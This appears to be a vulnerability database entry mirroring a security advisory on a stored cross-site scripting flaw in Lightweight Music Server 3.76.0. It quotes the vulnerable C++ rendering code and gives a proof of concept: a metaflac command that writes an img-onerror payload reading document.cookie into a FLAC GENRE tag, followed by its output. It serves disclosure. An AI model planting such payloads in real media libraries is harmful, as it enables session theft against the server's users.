📄 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419

Description

Lightweight Music Server version 3.76.0 suffers from a persistent cross site scripting vulnerability. LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders them in its web interface...

Visit Original Source

Basic Information

ID PACKETSTORM:222419

Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS

Vendor: Emeric Poupon
Product web page: https://github.com/epoupon/lms
Affected version 3.76.0

Summary: LMS (Lightweight Music Server): A specific C++ based
project focused on a low memory footprint, featuring built-in
user management and a recommendation engine.

Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,
and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored
cross-site scripting. An attacker who gets a file with a malicious
tag into the victim's library has their payload saved during the
next library scan and executed automatically whenever a user views
that track's information or plays the file in the web UI.

--------------------------------------------------------------
/src/lms/ui/Utils.cpp
---------------------
131: std::unique_ptr<Wt::WInteractWidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)
132: {
133: auto res{ std::make_unique<Wt::WText>(Wt::WString{ canDelete ? "<i class=\"fa fa-times-circle\"></i> " : "" } + name, Wt::TextFormat::UnsafeXHTML) };
134: res->setStyleClass("Lms-badge-cluster badge me-1 " + std::string{ colorStyleClass });
135: res->setInline(true);
136: return res;
137: }
--------------------------------------------------------------

Tested on: GNU/Linux (ARM64)
nginx

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5987
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987

27.05.2026

--

$ metaflac --set-tag=GENRE="<img src=1 onerror=alert(document.cookie)>" evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=<img src=1 onerror=alert(document.cookie)>
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140

{
    "lastseen": "2026-06-01T19:06:36",
    "description": "Lightweight Music Server version 3.76.0 suffers from a persistent cross site scripting vulnerability. LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders them in its web interface...",
    "published": "2026-06-01T00:00:00",
    "modified": "2026-06-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222419",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS\n    \n    \n    Vendor: Emeric Poupon\n    Product web page: https://github.com/epoupon/lms\n    Affected version 3.76.0\n    \n    Summary: LMS (Lightweight Music Server): A specific C++ based\n    project focused on a low memory footprint, featuring built-in\n    user management and a recommendation engine.\n    \n    Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,\n    and ALBUM) exactly as written in the file and later renders them\n    in its web interface without HTML-encoding, resulting in stored\n    cross-site scripting. An attacker who gets a file with a malicious\n    tag into the victim's library has their payload saved during the\n    next library scan and executed automatically whenever a user views\n    that track's information or plays the file in the web UI.\n    \n    --------------------------------------------------------------\n    /src/lms/ui/Utils.cpp\n    ---------------------\n    131: std::unique_ptr<Wt::WInteractWidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)\n    132: {\n    133:   auto res{ std::make_unique<Wt::WText>(Wt::WString{ canDelete ? \"<i class=\\\"fa fa-times-circle\\\"></i> \" : \"\" } + name, Wt::TextFormat::UnsafeXHTML) };\n    134:   res->setStyleClass(\"Lms-badge-cluster badge me-1 \" + std::string{ colorStyleClass });\n    135:   res->setInline(true);\n    136:   return res;\n    137: }\n    --------------------------------------------------------------\n    \n    Tested on: GNU/Linux (ARM64)\n               nginx\n    \n    \n    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n                                @zeroscience\n    \n    \n    Advisory ID: ZSL-2026-5987\n    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987\n    \n    \n    27.05.2026\n    \n    --\n    \n    \n    $ metaflac --set-tag=GENRE=\"<img src=1 onerror=alert(document.cookie)>\" evil.flac\n    $ metaflac --list evil.flac\n    METADATA block #0\n      type: 0 (STREAMINFO)\n      is last: false\n      length: 34\n      minimum blocksize: 4608 samples\n      maximum blocksize: 4608 samples\n      minimum framesize: 2305 bytes\n      maximum framesize: 14124 bytes\n      sample_rate: 44100 Hz\n      channels: 2\n      bits-per-sample: 16\n      total samples: 4664587\n      MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\n    METADATA block #1\n      type: 4 (VORBIS_COMMENT)\n      is last: false\n      length: 98\n      vendor string: Lavf57.83.100\n      comments: 2\n        comment[0]: encoder=Lavf57.83.100\n        comment[1]: GENRE=<img src=1 onerror=alert(document.cookie)>\n    METADATA block #2\n      type: 1 (PADDING)\n      is last: true\n      length: 8140",
    "sourceHref": "https://packetstorm.news/download/222419",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222419/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply